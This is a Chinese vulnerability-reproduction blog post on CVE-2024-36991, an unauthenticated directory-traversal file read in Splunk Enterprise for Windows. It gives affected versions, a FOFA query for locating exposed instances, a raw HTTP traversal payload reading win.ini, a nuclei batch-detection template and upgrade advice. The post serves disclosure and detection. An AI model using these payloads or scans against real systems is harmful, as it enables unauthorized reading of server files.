【漏洞复现】Splunk Enterprise 任意文件读取漏洞(CVE-2024-36991)

前言

Splunk Enterprise 是一款强大的机器数据管理和分析平台,能够实时收集、索引、搜索、分析和可视化来自各种数据源的日志和数据,帮助企业提升运营效率、增强安全性和优化业务决策。

漏洞名称Splunk Enterprise 任意文件读取漏洞
漏洞编号CVE-2024-36991
公开时间2024-07-01
威胁类型信息泄漏

漏洞描述

在特定版本的 Windows 版 Splunk Enterprise 中,未经身份认证的攻击者可以在 /modules/messaging/ 接口通过目录穿越的方式读取任意文件,造成用户信息的泄露。

影响版本

9.2 <= Splunk Enterprise < 9.2.2
9.1 <= Splunk Enterprise < 9.1.5
9.0 <= Splunk Enterprise < 9.0.10

漏洞复现

FOFA语法:

app="splunk-Enterprise"

POC

GET /zh-CN/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../windows/win.ini HTTP/1.1
Host: x.x.x.x
Connection: keep-alive

在这里插入图片描述

批量检测-nuclei脚本

id: CVE-2024-36991

info:
  name: Splunk Enterprise for Windows 任意文件读取漏洞
  author: whgojp
  description:  Splunk Enterprise 是一款强大的数据分析软件,它允许用户从各种来源收集、索引和搜索机器生成的数据。2024年7月,官方发布安全通告,披露 CVE-2024-36991 Splunk Enterprise Windows平台 modules/messaging 目录遍历漏洞。漏洞仅影响 Windows平台上的 Splunk Enterprise,官方已发布安全更新,建议升级至最新版本。
  reference:
    - https://advisory.splunk.com/SVD-2024-0711
  tags: cve,cve2024,splunk-Enterpris

requests:
  - method: GET
    path:
      - "{{BaseURL}}/zh-CN/modules/messaging/{{Path}}"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "NetSetup.log"
        part: body
        condition: or
      - type: word
        words:
          - "Windows"
          - "debug"
        part: body
        condition: or

variables:
  Path:
    - "C:../C:../C:../C:../C:../C:../C:../C:../windows/win.ini"

修复建议

目前官方已有可更新版本,建议受影响用户升级至最新版本:

Splunk Enterprise 9.2.2
Splunk Enterprise 9.1.5
Splunk Enterprise 9.0.10

官方地址:https://www.splunk.com/zh_cn/download.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值